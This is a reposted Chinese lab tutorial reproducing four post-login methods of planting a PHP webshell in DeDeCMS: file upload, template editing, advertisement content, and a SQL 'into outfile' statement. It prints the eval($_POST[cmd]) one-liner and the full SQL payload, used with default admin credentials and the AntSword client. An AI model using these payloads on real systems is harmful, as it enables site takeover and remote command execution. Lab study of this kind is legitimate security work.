当前位置: 首页> 科技> 名企 > DeDeCMS

DeDeCMS

时间:2025/7/11 1:02:58来源:https://blog.csdn.net/m0_63944205/article/details/140887557 浏览次数:2次

DeDeCMS

环境部署

同意协议

环境检测

参数配置

漏洞复现

姿势⼀:通过⽂件管理器上传WebShell

#前台
http://192.168.4.139/dedecms/index.php?upcache=1
#后台
http://192.168.4.139/dedecms/dede/
#信息
username:admin
password:admin

上传文件

成功上传

文件内容
<?php phpinfo();@eval($_POST[cmd]);?>

蚁剑连接getshell

姿势⼆:修改模板⽂件拿WebShell

找到默认模板下的index.html

并修改代码,修改如下

点击 【⽣成】 --》 【更新主⻚HTML】 --》将主⻚位置修改为 【../index.php 】--》 点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化..

页面如下

使用蚁剑进行连接

姿势三:后台任意命令执⾏拿WebShell

点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添 加⼀句话代码--》点击 【确定】

广告内容如下

<?php phpinfo();@eval($_POST[cmd]);?>

点击代码找到广告路径

访问路径

用蚁剑连接

姿势四:sql命令行执行拿webshell

找到系统-sql命令行执行工具

sql语句

select  "<?php phpinfo();@eval($_POST[cmd]);" into outfile "E:/phpstudy_pro/WWW/DedeCMS/uploads/shell.php"

查看文件

用蚁剑连接

关键字:DeDeCMS

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: